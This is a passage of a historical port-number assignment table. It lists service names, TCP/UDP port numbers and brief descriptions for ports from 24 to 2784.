  1862.                  24/udp    any private mail system
  1863. smtp             25/tcp    Simple Mail Transfer
  1864. smtp             25/udp    Simple Mail Transfer
  1865.                  26/tcp    Unassigned
  1866.                  26/udp    Unassigned
  1867. nsw-fe           27/tcp    NSW User System FE
  1868. nsw-fe           27/udp    NSW User System FE
  1869.                  28/tcp    Unassigned
  1870.                  28/udp    Unassigned
  1871. msg-icp          29/tcp    MSG ICP
  1872. msg-icp          29/udp    MSG ICP
  1873.                  30/tcp    Unassigned
  1874.                  30/udp    Unassigned
  1875. msg-auth         31/tcp    MSG Authentication
  1876. msg-auth         31/udp    MSG Authentication
  1877.                  32/tcp    Unassigned
  1878.                  32/udp    Unassigned
  1879. dsp              33/tcp    Display Support Protocol
  1880. dsp              33/udp    Display Support Protocol
  1881.                  34/tcp    Unassigned
  1882.                  34/udp    Unassigned
  1883.                  35/tcp    any private printer server
  1884.                  35/udp    any private printer server
  1885.                  36/tcp    Unassigned
  1886.                  36/udp    Unassigned
  1887. time             37/tcp    Time
  1888. time             37/udp    Time
  1889.                  38/tcp    Unassigned
  1890.                  38/udp    Unassigned
  1891. rlp              39/tcp    Resource Location Protocol
  1892. rlp              39/udp    Resource Location Protocol
  1893.                  40/tcp    Unassigned
  1894.                  40/udp    Unassigned
  1895. graphics         41/tcp    Graphics
  1896. graphics         41/udp    Graphics
  1897. nameserver       42/tcp    Host Name Server
  1898. nameserver       42/udp    Host Name Server
  1899. nicname          43/tcp    Who Is
  1900. nicname          43/udp    Who Is
  1901. mpm-flags        44/tcp    MPM FLAGS Protocol
  1902. mpm-flags        44/udp    MPM FLAGS Protocol
  1903. mpm              45/tcp    Message Processing Module [recv]
  1904. mpm              45/udp    Message Processing Module [recv]
  1905. mpm-snd          46/tcp    MPM [default send]
  1906. mpm-snd          46/udp    MPM [default send]
  1907. ni-ftp           47/tcp    NI FTP
  1908. ni-ftp           47/udp    NI FTP
  1909.                  48/tcp    Unassigned
  1910.                  48/udp    Unassigned
  1911. login            49/tcp    Login Host Protocol
  1912. login            49/udp    Login Host Protocol
  1913. re-mail-ck       50/tcp    Remote Mail Checking Protocol
  1914. re-mail-ck       50/udp    Remote Mail Checking Protocol
  1915. la-maint         51/tcp    IMP Logical Address Maintenance
  1916. la-maint         51/udp    IMP Logical Address Maintenance
  1917. xns-time         52/tcp    XNS Time Protocol
  1918. xns-time         52/udp    XNS Time Protocol
  1919. domain           53/tcp    Domain Name Server
  1920. domain           53/udp    Domain Name Server
  1921. xns-ch           54/tcp    XNS Clearinghouse
  1922. xns-ch           54/udp    XNS Clearinghouse
  1923. isi-gl           55/tcp    ISI Graphics Language
  1924. isi-gl           55/udp    ISI Graphics Language
  1925. xns-auth         56/tcp    XNS Authentication
  1926. xns-auth         56/udp    XNS Authentication
  1927.                  57/tcp    any private terminal access
  1928.                  57/udp    any private terminal access
  1929. xns-mail         58/tcp    XNS Mail
  1930. xns-mail         58/udp    XNS Mail
  1931.                  59/tcp    any private file service
  1932.                  59/udp    any private file service
  1933.                  60/tcp    Unassigned
  1934.                  60/udp    Unassigned
  1935. ni-mail          61/tcp    NI MAIL
  1936. ni-mail          61/udp    NI MAIL
  1937. acas             62/tcp    ACA Services
  1938. acas             62/udp    ACA Services
  1939. via-ftp          63/tcp    VIA Systems - FTP
  1940. via-ftp          63/udp    VIA Systems - FTP
  1941. covia            64/tcp    Communications Integrator (CI)
  1942. covia            64/udp    Communications Integrator (CI)
  1943. tacacs-ds        65/tcp    TACACS-Database Service
  1944. tacacs-ds        65/udp    TACACS-Database Service
  1945. sql*net          66/tcp    Oracle SQL*NET
  1946. sql*net          66/udp    Oracle SQL*NET
  1947. bootps           67/tcp    Bootstrap Protocol Server
  1948. bootps           67/udp    Bootstrap Protocol Server
  1949. bootpc           68/tcp    Bootstrap Protocol Client
  1950. bootpc           68/udp    Bootstrap Protocol Client
  1951. tftp             69/tcp    Trivial File Transfer
  1952. tftp             69/udp    Trivial File Transfer
  1953. gopher           70/tcp    Gopher
  1954. gopher           70/udp    Gopher
  1955. netrjs-1         71/tcp    Remote Job Service
  1956. netrjs-1         71/udp    Remote Job Service
  1957. netrjs-2         72/tcp    Remote Job Service
  1958. netrjs-2         72/udp    Remote Job Service
  1959. netrjs-3         73/tcp    Remote Job Service
  1960. netrjs-3         73/udp    Remote Job Service
  1961. netrjs-4         74/tcp    Remote Job Service
  1962. netrjs-4         74/udp    Remote Job Service
  1963.                  75/tcp    any private dial out service
  1964.                  75/udp    any private dial out service
  1965.                  76/tcp    Unassigned
  1966.                  76/udp    Unassigned
  1967.                  77/tcp    any private RJE service
  1968.                  77/udp    any private RJE service
  1969. vettcp           78/tcp    vettcp
  1970. vettcp           78/udp    vettcp
  1971. finger           79/tcp    Finger
  1972. finger           79/udp    Finger
  1973. www              80/tcp    World Wide Web HTTP
  1974. www              80/udp    World Wide Web HTTP
  1975. hosts2-ns        81/tcp    HOSTS2 Name Server
  1976. hosts2-ns        81/udp    HOSTS2 Name Server
  1977. xfer             82/tcp    XFER Utility
  1978. xfer             82/udp    XFER Utility
  1979. mit-ml-dev       83/tcp    MIT ML Device
  1980. mit-ml-dev       83/udp    MIT ML Device
  1981. ctf              84/tcp    Common Trace Facility
  1982. ctf              84/udp    Common Trace Facility
  1983. mit-ml-dev       85/tcp    MIT ML Device
  1984. mit-ml-dev       85/udp    MIT ML Device
  1985. mfcobol          86/tcp    Micro Focus Cobol
  1986. mfcobol          86/udp    Micro Focus Cobol
  1987.                  87/tcp    any private terminal link
  1988.                  87/udp    any private terminal link
  1989. kerberos         88/tcp    Kerberos
  1990. kerberos         88/udp    Kerberos
  1991. su-mit-tg        89/tcp    SU/MIT Telnet Gateway
  1992. su-mit-tg        89/udp    SU/MIT Telnet Gateway
  1993. dnsix            90/tcp    DNSIX Securit Attribute Token Map
  1994. dnsix            90/udp    DNSIX Securit Attribute Token Map
  1995. mit-dov          91/tcp    MIT Dover Spooler
  1996. mit-dov          91/udp    MIT Dover Spooler
  1997. npp              92/tcp    Network Printing Protocol
  1998. npp              92/udp    Network Printing Protocol
  1999. dcp              93/tcp    Device Control Protocol
  2000. dcp              93/udp    Device Control Protocol
  2001. objcall          94/tcp    Tivoli Object Dispatcher
  2002. objcall          94/udp    Tivoli Object Dispatcher
  2003. supdup           95/tcp    SUPDUP
  2004. supdup           95/udp    SUPDUP
  2005. dixie            96/tcp    DIXIE Protocol Specification
  2006. dixie            96/udp    DIXIE Protocol Specification
  2007. swift-rvf        97/tcp    Swift Remote Vitural File Protocol
  2008. swift-rvf        97/udp    Swift Remote Vitural File Protocol
  2009. tacnews          98/tcp    TAC News
  2010. tacnews          98/udp    TAC News
  2011. metagram         99/tcp    Metagram Relay
  2012. metagram         99/udp    Metagram Relay
  2013. newacct         100/tcp    [unauthorized use]
  2014. hostname        101/tcp    NIC Host Name Server
  2015. hostname        101/udp    NIC Host Name Server
  2016. iso-tsap        102/tcp    ISO-TSAP
  2017. iso-tsap        102/udp    ISO-TSAP
  2018. gppitnp         103/tcp    Genesis Point-to-Point Trans Net
  2019. gppitnp         103/udp    Genesis Point-to-Point Trans Net
  2020. acr-nema        104/tcp    ACR-NEMA Digital Imag. & Comm. 300
  2021. acr-nema        104/udp    ACR-NEMA Digital Imag. & Comm. 300
  2022. csnet-ns        105/tcp    Mailbox Name Nameserver
  2023. csnet-ns        105/udp    Mailbox Name Nameserver
  2024. 3com-tsmux      106/tcp    3COM-TSMUX
  2025. 3com-tsmux      106/udp    3COM-TSMUX
  2026. rtelnet         107/tcp    Remote Telnet Service
  2027. rtelnet         107/udp    Remote Telnet Service
  2028. snagas          108/tcp    SNA Gateway Access Server
  2029. snagas          108/udp    SNA Gateway Access Server
  2030. pop2            109/tcp    Post Office Protocol - Version 2
  2031. pop2            109/udp    Post Office Protocol - Version 2
  2032. pop3            110/tcp    Post Office Protocol - Version 3
  2033. pop3            110/udp    Post Office Protocol - Version 3
  2034. sunrpc          111/tcp    SUN Remote Procedure Call
  2035. sunrpc          111/udp    SUN Remote Procedure Call
  2036. mcidas          112/tcp    McIDAS Data Transmission Protocol
  2037. mcidas          112/udp    McIDAS Data Transmission Protocol
  2038. auth            113/tcp    Authentication Service
  2039. auth            113/udp    Authentication Service
  2040. audionews       114/tcp    Audio News Multicast
  2041. audionews       114/udp    Audio News Multicast
  2042. sftp            115/tcp    Simple File Transfer Protocol
  2043. sftp            115/udp    Simple File Transfer Protocol
  2044. ansanotify      116/tcp    ANSA REX Notify
  2045. ansanotify      116/udp    ANSA REX Notify
  2046. uucp-path       117/tcp    UUCP Path Service
  2047. uucp-path       117/udp    UUCP Path Service
  2048. sqlserv         118/tcp    SQL Services
  2049. sqlserv         118/udp    SQL Services
  2050. nntp            119/tcp    Network News Transfer Protocol
  2051. nntp            119/udp    Network News Transfer Protocol
  2052. cfdptkt         120/tcp    CFDPTKT
  2053. cfdptkt         120/udp    CFDPTKT
  2054. erpc            121/tcp    Encore Expedited Remote Pro.Call
  2055. erpc            121/udp    Encore Expedited Remote Pro.Call
  2056. smakynet        122/tcp    SMAKYNET
  2057. smakynet        122/udp    SMAKYNET
  2058. ntp             123/tcp    Network Time Protocol
  2059. ntp             123/udp    Network Time Protocol
  2060. ansatrader      124/tcp    ANSA REX Trader
  2061. ansatrader      124/udp    ANSA REX Trader
  2062. locus-map       125/tcp    Locus PC-Interface Net Map Ser
  2063. locus-map       125/udp    Locus PC-Interface Net Map Ser
  2064. unitary         126/tcp    Unisys Unitary Login
  2065. unitary         126/udp    Unisys Unitary Login
  2066. locus-con       127/tcp    Locus PC-Interface Conn Server
  2067. locus-con       127/udp    Locus PC-Interface Conn Server
  2068. gss-xlicen      128/tcp    GSS X License Verification
  2069. gss-xlicen      128/udp    GSS X License Verification
  2070. pwdgen          129/tcp    Password Generator Protocol
  2071. pwdgen          129/udp    Password Generator Protocol
  2072. cisco-fna       130/tcp    cisco FNATIVE
  2073. cisco-fna       130/udp    cisco FNATIVE
  2074. cisco-tna       131/tcp    cisco TNATIVE
  2075. cisco-tna       131/udp    cisco TNATIVE
  2076. cisco-sys       132/tcp    cisco SYSMAINT
  2077. cisco-sys       132/udp    cisco SYSMAINT
  2078. statsrv         133/tcp    Statistics Service
  2079. statsrv         133/udp    Statistics Service
  2080. ingres-net      134/tcp    INGRES-NET Service
  2081. ingres-net      134/udp    INGRES-NET Service
  2082. loc-srv         135/tcp    Location Service
  2083. loc-srv         135/udp    Location Service
  2084. profile         136/tcp    PROFILE Naming System
  2085. profile         136/udp    PROFILE Naming System
  2086. netbios-ns      137/tcp    NETBIOS Name Service
  2087. netbios-ns      137/udp    NETBIOS Name Service
  2088. netbios-dgm     138/tcp    NETBIOS Datagram Service
  2089. netbios-dgm     138/udp    NETBIOS Datagram Service
  2090. netbios-ssn     139/tcp    NETBIOS Session Service
  2091. netbios-ssn     139/udp    NETBIOS Session Service
  2092. emfis-data      140/tcp    EMFIS Data Service
  2093. emfis-data      140/udp    EMFIS Data Service
  2094. emfis-cntl      141/tcp    EMFIS Control Service
  2095. emfis-cntl      141/udp    EMFIS Control Service
  2096. bl-idm          142/tcp    Britton-Lee IDM
  2097. bl-idm          142/udp    Britton-Lee IDM
  2098. imap2           143/tcp    Interim Mail Access Protocol v2
  2099. imap2           143/udp    Interim Mail Access Protocol v2
  2100. news            144/tcp    NewS
  2101. news            144/udp    NewS
  2102. uaac            145/tcp    UAAC Protocol
  2103. uaac            145/udp    UAAC Protocol
  2104. iso-tp0         146/tcp    ISO-IP0
  2105. iso-tp0         146/udp    ISO-IP0
  2106. iso-ip          147/tcp    ISO-IP
  2107. iso-ip          147/udp    ISO-IP
  2108. cronus          148/tcp    CRONUS-SUPPORT
  2109. cronus          148/udp    CRONUS-SUPPORT
  2110. aed-512         149/tcp    AED 512 Emulation Service
  2111. aed-512         149/udp    AED 512 Emulation Service
  2112. sql-net         150/tcp    SQL-NET
  2113. sql-net         150/udp    SQL-NET
  2114. hems            151/tcp    HEMS
  2115. hems            151/udp    HEMS
  2116. bftp            152/tcp    Background File Transfer Program
  2117. bftp            152/udp    Background File Transfer Program
  2118. sgmp            153/tcp    SGMP
  2119. sgmp            153/udp    SGMP
  2120. netsc-prod      154/tcp    NETSC
  2121. netsc-prod      154/udp    NETSC
  2122. netsc-dev       155/tcp    NETSC
  2123. netsc-dev       155/udp    NETSC
  2124. sqlsrv          156/tcp    SQL Service
  2125. sqlsrv          156/udp    SQL Service
  2126. knet-cmp        157/tcp    KNET/VM Command/Message Protocol
  2127. knet-cmp        157/udp    KNET/VM Command/Message Protocol
  2128. pcmail-srv      158/tcp    PCMail Server
  2129. pcmail-srv      158/udp    PCMail Server
  2130. nss-routing     159/tcp   NSS-Routing
  2131. nss-routing     159/udp   NSS-Routing
  2132. sgmp-traps      160/tcp    SGMP-TRAPS
  2133. sgmp-traps      160/udp    SGMP-TRAPS
  2134. snmp            161/tcp    SNMP
  2135. snmp            161/udp    SNMP
  2136. snmptrap        162/tcp    SNMPTRAP
  2137. snmptrap        162/udp    SNMPTRAP
  2138. cmip-man        163/tcp    CMIP/TCP Manager
  2139. cmip-man        163/udp    CMIP/TCP Manager
  2140. cmip-agent      164/tcp    CMIP/TCP Agent
  2141. smip-agent      164/udp    CMIP/TCP Agent
  2142. xns-courier     165/tcp   Xerox
  2143. xns-courier     165/udp   Xerox
  2144. s-net           166/tcp    Sirius Systems
  2145. s-net           166/udp    Sirius Systems
  2146. namp            167/tcp    NAMP
  2147. namp            167/udp    NAMP
  2148. rsvd            168/tcp    RSVD
  2149. rsvd            168/udp    RSVD
  2150. send            169/tcp    SEND
  2151. send            169/udp    SEND
  2152. print-srv       170/tcp    Network PostScript
  2153. print-srv       170/udp    Network PostScript
  2154. multiplex       171/tcp    Network Innovations Multiplex
  2155. multiplex       171/udp    Network Innovations Multiplex
  2156. cl/1            172/tcp    Network Innovations CL/1
  2157. cl/1            172/udp    Network Innovations CL/1
  2158. xyplex-mux      173/tcp    Xyplex
  2159. xyplex-mux      173/udp    Xyplex
  2160. mailq           174/tcp    MAILQ
  2161. mailq           174/udp    MAILQ
  2162. vmnet           175/tcp    VMNET
  2163. vmnet           175/udp    VMNET
  2164. genrad-mux      176/tcp    GENRAD-MUX
  2165. genrad-mux      176/udp    GENRAD-MUX
  2166. xdmcp           177/tcp    X Display Manager Control Protocol
  2167. xdmcp           177/udp    X Display Manager Control Protocol
  2168. nextstep        178/tcp    NextStep Window Server
  2169. NextStep        178/udp    NextStep Window Server
  2170. bgp             179/tcp    Border Gateway Protocol
  2171. bgp             179/udp    Border Gateway Protocol
  2172. ris             180/tcp    Intergraph
  2173. ris             180/udp    Intergraph
  2174. unify           181/tcp    Unify
  2175. unify           181/udp    Unify
  2176. audit           182/tcp    Unisys Audit SITP
  2177. audit           182/udp    Unisys Audit SITP
  2178. ocbinder        183/tcp    OCBinder
  2179. ocbinder        183/udp    OCBinder
  2180. ocserver        184/tcp    OCServer
  2181. ocserver        184/udp    OCServer
  2182. remote-kis      185/tcp    Remote-KIS
  2183. remote-kis      185/udp    Remote-KIS
  2184. kis             186/tcp    KIS Protocol
  2185. kis             186/udp    KIS Protocol
  2186. aci             187/tcp    Application Communication Interface
  2187. aci             187/udp    Application Communication Interface
  2188. mumps           188/tcp    Plus Five's MUMPS
  2189. mumps           188/udp    Plus Five's MUMPS
  2190. qft             189/tcp    Queued File Transport
  2191. qft             189/udp    Queued File Transport
  2192. gacp            190/tcp    Gateway Access Control Protocol
  2193. cacp            190/udp    Gateway Access Control Protocol
  2194. prospero        191/tcp    Prospero
  2195. prospero        191/udp    Prospero
  2196. osu-nms         192/tcp    OSU Network Monitoring System
  2197. osu-nms         192/udp    OSU Network Monitoring System
  2198. srmp            193/tcp    Spider Remote Monitoring Protocol
  2199. srmp            193/udp    Spider Remote Monitoring Protocol
  2200. irc             194/tcp    Internet Relay Chat Protocol
  2201. irc             194/udp    Internet Relay Chat Protocol
  2202. dn6-nlm-aud     195/tcp    DNSIX Network Level Module Audit
  2203. dn6-nlm-aud     195/udp    DNSIX Network Level Module Audit
  2204. dn6-smm-red     196/tcp    DNSIX Session Mgt Module Audit Redir
  2205. dn6-smm-red     196/udp    DNSIX Session Mgt Module Audit Redir
  2206. dls             197/tcp    Directory Location Service
  2207. dls             197/udp    Directory Location Service
  2208. dls-mon         198/tcp    Directory Location Service Monitor
  2209. dls-mon         198/udp    Directory Location Service Monitor
  2210. smux            199/tcp    SMUX
  2211. smux            199/udp    SMUX
  2212. src             200/tcp    IBM System Resource Controller
  2213. src             200/udp    IBM System Resource Controller
  2214. at-rtmp         201/tcp    AppleTalk Routing Maintenance
  2215. at-rtmp         201/udp    AppleTalk Routing Maintenance
  2216. at-nbp          202/tcp    AppleTalk Name Binding
  2217. at-nbp          202/udp    AppleTalk Name Binding
  2218. at-3            203/tcp    AppleTalk Unused
  2219. at-3            203/udp    AppleTalk Unused
  2220. at-echo         204/tcp    AppleTalk Echo
  2221. at-echo         204/udp    AppleTalk Echo
  2222. at-5            205/tcp    AppleTalk Unused
  2223. at-5            205/udp    AppleTalk Unused
  2224. at-zis          206/tcp    AppleTalk Zone Information
  2225. at-zis          206/udp    AppleTalk Zone Information
  2226. at-7            207/tcp    AppleTalk Unused
  2227. at-7            207/udp    AppleTalk Unused
  2228. at-8            208/tcp    AppleTalk Unused
  2229. at-8            208/udp    AppleTalk Unused
  2230. tam             209/tcp    Trivial Authenticated Mail Protocol
  2231. tam             209/udp    Trivial Authenticated Mail Protocol
  2232. z39.50          210/tcp    ANSI Z39.50
  2233. z39.50          210/udp    ANSI Z39.50
  2234. 914c/g          211/tcp    Texas Instruments 914C/G Terminal
  2235. 914c/g          211/udp    Texas Instruments 914C/G Terminal
  2236. anet            212/tcp    ATEXSSTR
  2237. anet            212/udp    ATEXSSTR
  2238. ipx             213/tcp    IPX
  2239. ipx             213/udp    IPX
  2240. vmpwscs         214/tcp    VM PWSCS
  2241. vmpwscs         214/udp    VM PWSCS
  2242. softpc          215/tcp    Insignia Solutions
  2243. softpc          215/udp    Insignia Solutions
  2244. atls            216/tcp    Access Technology License Server
  2245. atls            216/udp    Access Technology License Server
  2246. dbase           217/tcp    dBASE Unix
  2247. dbase           217/udp    dBASE Unix
  2248. mpp             218/tcp    Netix Message Posting Protocol
  2249. mpp             218/udp    Netix Message Posting Protocol
  2250. uarps           219/tcp    Unisys ARPs
  2251. uarps           219/udp    Unisys ARPs
  2252. imap3           220/tcp    Interactive Mail Access Protocol v3
  2253. imap3           220/udp    Interactive Mail Access Protocol v3
  2254. fln-spx         221/tcp    Berkeley rlogind with SPX auth
  2255. fln-spx         221/udp    Berkeley rlogind with SPX auth
  2256. fsh-spx         222/tcp    Berkeley rshd with SPX auth
  2257. fsh-spx         222/udp    Berkeley rshd with SPX auth
  2258. cdc             223/tcp    Certificate Distribution Center
  2259. cdc             223/udp    Certificate Distribution Center
  2260.                 224-241    Reserved
  2261. sur-meas        243/tcp    Survey Measurement
  2262. sur-meas        243/udp    Survey Measurement
  2263. link            245/tcp    LINK
  2264. link            245/udp    LINK
  2265. dsp3270         246/tcp    Display Systems Protocol
  2266. dsp3270         246/udp    Display Systems Protocol
  2267.                 247-255    Reserved
  2268. pawserv         345/tcp    Perf Analysis Workbench
  2269. pawserv         345/udp    Perf Analysis Workbench
  2270. zserv           346/tcp    Zebra server
  2271. zserv           346/udp    Zebra server
  2272. fatserv         347/tcp    Fatmen Server
  2273. fatserv         347/udp    Fatmen Server
  2274. clearcase       371/tcp    Clearcase
  2275. clearcase       371/udp    Clearcase
  2276. ulistserv       372/tcp    Unix Listserv
  2277. ulistserv       372/udp    Unix Listserv
  2278. legent-1        373/tcp    Legent Corporation
  2279. legent-1        373/udp    Legent Corporation
  2280. legent-2        374/tcp    Legent Corporation
  2281. legent-2        374/udp    Legent Corporation
  2282. exec            512/tcp    remote process execution;
  2283.                            authentication performed using
  2284.                            passwords and UNIX login names
  2285. biff            512/udp    used by mail system to notify users
  2286.                            of new mail received; currently
  2287.                            receives messages only from
  2288.                            processes on the same machine
  2289. login           513/tcp    remote login a la telnet;
  2290.                            automatic authentication performed
  2291.                            based on priviledged port numbers
  2292.                            and distributed data bases which
  2293.                            identify "authentication domains"
  2294. who             513/udp    maintains data bases showing who's
  2295.                            logged in to machines on a local
  2296.                            net and the load average of the
  2297.                            machine
  2298. cmd             514/tcp    like exec, but automatic
  2299.                            authentication is performed as for
  2300.                            login server
  2301. syslog          514/udp
  2302. printer         515/tcp    spooler
  2303. printer         515/udp    spooler
  2304. talk            517/tcp    like tenex link, but across
  2305.                            machine - unfortunately, doesn't
  2306.                            use link protocol (this is actually
  2307.                            just a rendezvous port from which a
  2308.                            tcp connection is established)
  2309. talk            517/udp    like tenex link, but across
  2310.                            machine - unfortunately, doesn't
  2311.                            use link protocol (this is actually
  2312.                            just a rendezvous port from which a
  2313.                            tcp connection is established)
  2314. ntalk           518/tcp
  2315. ntalk           518/udp
  2316. utime           519/tcp    unixtime
  2317. utime           519/udp    unixtime
  2318. efs             520/tcp    extended file name server
  2319. router          520/udp    local routing process (on site);
  2320.                            uses variant of Xerox NS routing
  2321.                            information protocol
  2322. timed           525/tcp    timeserver
  2323. timed           525/udp    timeserver
  2324. tempo           526/tcp    newdate
  2325. tempo           526/udp    newdate
  2326. courier         530/tcp    rpc
  2327. courier         530/udp    rpc
  2328. conference      531/tcp    chat
  2329. conference      531/udp    chat
  2330. netnews         532/tcp    readnews
  2331. netnews         532/udp    readnews
  2332. netwall         533/tcp    for emergency broadcasts
  2333. netwall         533/udp    for emergency broadcasts
  2334. uucp            540/tcp    uucpd
  2335. uucp            540/udp    uucpd
  2336. klogin          543/tcp
  2337. klogin          543/udp
  2338. kshell          544/tcp    krcmd
  2339. kshell          544/udp    krcmd
  2340. new-rwho        550/tcp    new-who
  2341. new-rwho        550/udp    new-who
  2342. dsf             555/tcp
  2343. dsf             555/udp
  2344. remotefs        556/tcp    rfs server
  2345. remotefs        556/udp    rfs server
  2346. rmonitor        560/tcp    rmonitord
  2347. rmonitor        560/udp    rmonitord
  2348. monitor         561/tcp
  2349. monitor         561/udp
  2350. chshell         562/tcp    chcmd
  2351. chshell         562/udp    chcmd
  2352. 9pfs            564/tcp    plan 9 file service
  2353. 9pfs            564/udp    plan 9 file service
  2354. whoami          565/tcp    whoami
  2355. whoami          565/udp    whoami
  2356. meter           570/tcp    demon
  2357. meter           570/udp    demon
  2358. meter           571/tcp    udemon
  2359. meter           571/udp    udemon
  2360. ipcserver       600/tcp    Sun IPC server
  2361. ipcserver       600/udp    Sun IPC server
  2362. nqs             607/tcp    nqs
  2363. nqs             607/udp    nqs
  2364. mdqs            666/tcp
  2365. mdqs            666/udp
  2366. elcsd           704/tcp    errlog copy/server daemon
  2367. elcsd           704/udp    errlog copy/server daemon
  2368. netcp           740/tcp    NETscout Control Protocol
  2369. netcp           740/udp    NETscout Control Protocol
  2370. netgw           741/tcp    netGW
  2371. netgw           741/udp    netGW
  2372. netrcs          742/tcp    Network based Rev. Cont. Sys.
  2373. netrcs          742/udp    Network based Rev. Cont. Sys.
  2374. flexlm          744/tcp    Flexible License Manager
  2375. flexlm          744/udp    Flexible License Manager
  2376. fujitsu-dev     747/tcp    Fujitsu Device Control
  2377. fujitsu-dev     747/udp    Fujitsu Device Control
  2378. ris-cm          748/tcp    Russell Info Sci Calendar Manager
  2379. ris-cm          748/udp    Russell Info Sci Calendar Manager
  2380. kerberos-adm    749/tcp    kerberos administration
  2381. kerberos-adm    749/udp    kerberos administration
  2382. rfile           750/tcp
  2383. loadav          750/udp
  2384. pump            751/tcp
  2385. pump            751/udp
  2386. qrh             752/tcp
  2387. qrh             752/udp
  2388. rrh             753/tcp
  2389. rrh             753/udp
  2390. tell            754/tcp     send
  2391. tell            754/udp     send
  2392. nlogin          758/tcp
  2393. nlogin          758/udp
  2394. con             759/tcp
  2395. con             759/udp
  2396. ns              760/tcp
  2397. ns              760/udp
  2398. rxe             761/tcp
  2399. rxe             761/udp
  2400. quotad          762/tcp
  2401. quotad          762/udp
  2402. cycleserv       763/tcp
  2403. cycleserv       763/udp
  2404. omserv          764/tcp
  2405. omserv          764/udp
  2406. webster         765/tcp
  2407. webster         765/udp
  2408. phonebook       767/tcp    phone
  2409. phonebook       767/udp    phone
  2410. vid             769/tcp
  2411. vid             769/udp
  2412. cadlock         770/tcp
  2413. cadlock         770/udp
  2414. rtip            771/tcp
  2415. rtip            771/udp
  2416. cycleserv2      772/tcp
  2417. cycleserv2      772/udp
  2418. submit          773/tcp
  2419. notify          773/udp
  2420. rpasswd         774/tcp
  2421. acmaint_dbd     774/udp
  2422. entomb          775/tcp
  2423. acmaint_transd  775/udp
  2424. wpages          776/tcp
  2425. wpages          776/udp
  2426. wpgs            780/tcp
  2427. wpgs            780/udp
  2428. hp-collector    781/tcp        hp performance data collector
  2429. hp-collector    781/udp        hp performance data collector
  2430. hp-managed-node 782/tcp        hp performance data managed node
  2431. hp-managed-node 782/udp        hp performance data managed node
  2432. hp-alarm-mgr    783/tcp        hp performance data alarm manager
  2433. hp-alarm-mgr    783/udp        hp performance data alarm manager
  2434. mdbs_daemon     800/tcp
  2435. mdbs_daemon     800/udp
  2436. device          801/tcp
  2437. device          801/udp
  2438. xtreelic        996/tcp        XTREE License Server
  2439. xtreelic        996/udp        XTREE License Server
  2440. maitrd          997/tcp
  2441. maitrd          997/udp
  2442. busboy          998/tcp
  2443. puparp          998/udp
  2444. garcon          999/tcp
  2445. applix          999/udp        Applix ac
  2446. puprouter       999/tcp
  2447. puprouter       999/udp
  2448. cadlock         1000/tcp
  2449. ock             1000/udp
  2450. blackjack       1025/tcp   network blackjack
  2451. blackjack       1025/udp   network blackjack
  2452. hermes          1248/tcp
  2453. hermes          1248/udp
  2454. bbn-mmc         1347/tcp   multi media conferencing
  2455. bbn-mmc         1347/udp   multi media conferencing
  2456. bbn-mmx         1348/tcp   multi media conferencing
  2457. bbn-mmx         1348/udp   multi media conferencing
  2458. sbook           1349/tcp   Registration Network Protocol
  2459. sbook           1349/udp   Registration Network Protocol
  2460. editbench       1350/tcp   Registration Network Protocol
  2461. editbench       1350/udp   Registration Network Protocol
  2462. equationbuilder 1351/tcp   Digital Tool Works (MIT)
  2463. equationbuilder 1351/udp   Digital Tool Works (MIT)
  2464. lotusnote       1352/tcp   Lotus Note
  2465. lotusnote       1352/udp   Lotus Note
  2466. ingreslock      1524/tcp   ingres
  2467. ingreslock      1524/udp   ingres
  2468. orasrv          1525/tcp   oracle
  2469. orasrv          1525/udp   oracle
  2470. prospero-np     1525/tcp   prospero non-privileged
  2471. prospero-np     1525/udp   prospero non-privileged
  2472. tlisrv          1527/tcp   oracle
  2473. tlisrv          1527/udp   oracle
  2474. coauthor        1529/tcp   oracle
  2475. coauthor        1529/udp   oracle
  2476. issd            1600/tcp
  2477. issd            1600/udp
  2478. nkd             1650/tcp
  2479. nkd             1650/udp
  2480. callbook        2000/tcp
  2481. callbook        2000/udp
  2482. dc              2001/tcp
  2483. wizard          2001/udp    curry
  2484. globe           2002/tcp
  2485. globe           2002/udp
  2486. mailbox         2004/tcp
  2487. emce            2004/udp    CCWS mm conf
  2488. berknet         2005/tcp
  2489. oracle          2005/udp
  2490. invokator       2006/tcp
  2491. raid-cc         2006/udp    raid
  2492. dectalk         2007/tcp
  2493. raid-am         2007/udp
  2494. conf            2008/tcp
  2495. terminaldb      2008/udp
  2496. news            2009/tcp
  2497. whosockami      2009/udp
  2498. search          2010/tcp
  2499. pipe_server     2010/udp
  2500. raid-cc         2011/tcp    raid
  2501. servserv        2011/udp
  2502. ttyinfo         2012/tcp
  2503. raid-ac         2012/udp
  2504. raid-am         2013/tcp
  2505. raid-cd         2013/udp
  2506. troff           2014/tcp
  2507. raid-sf         2014/udp
  2508. cypress         2015/tcp
  2509. raid-cs         2015/udp
  2510. bootserver      2016/tcp
  2511. bootserver      2016/udp
  2512. cypress-stat    2017/tcp
  2513. bootclient      2017/udp
  2514. terminaldb      2018/tcp
  2515. rellpack        2018/udp
  2516. whosockami      2019/tcp
  2517. about           2019/udp
  2518. xinupageserver  2020/tcp
  2519. xinupageserver  2020/udp
  2520. servexec        2021/tcp
  2521. xinuexpansion1  2021/udp
  2522. down            2022/tcp
  2523. xinuexpansion2  2022/udp
  2524. xinuexpansion3  2023/tcp
  2525. xinuexpansion3  2023/udp
  2526. xinuexpansion4  2024/tcp
  2527. xinuexpansion4  2024/udp
  2528. ellpack         2025/tcp
  2529. xribs           2025/udp
  2530. scrabble        2026/tcp
  2531. scrabble        2026/udp
  2532. shadowserver    2027/tcp
  2533. shadowserver    2027/udp
  2534. submitserver    2028/tcp
  2535. submitserver    2028/udp
  2536. device2         2030/tcp
  2537. device2         2030/udp
  2538. blackboard      2032/tcp
  2539. blackboard      2032/udp
  2540. glogger         2033/tcp
  2541. glogger         2033/udp
  2542. scoremgr        2034/tcp
  2543. scoremgr        2034/udp
  2544. imsldoc         2035/tcp
  2545. imsldoc         2035/udp
  2546. objectmanager   2038/tcp
  2547. objectmanager   2038/udp
  2548. lam             2040/tcp
  2549. lam             2040/udp
  2550. interbase       2041/tcp
  2551. interbase       2041/udp
  2552. isis            2042/tcp
  2553. isis            2042/udp
  2554. isis-bcast      2043/tcp
  2555. isis-bcast      2043/udp
  2556. rimsl           2044/tcp
  2557. rimsl           2044/udp
  2558. cdfunc          2045/tcp
  2559. cdfunc          2045/udp
  2560. sdfunc          2046/tcp
  2561. sdfunc          2046/udp
  2562. dls             2047/tcp
  2563. dls             2047/udp
  2564. dls-monitor     2048/tcp
  2565. dls-monitor     2048/udp
  2566. shilp           2049/tcp
  2567. shilp           2049/udp
  2568. www-dev         2784/tcp   world wide web - development
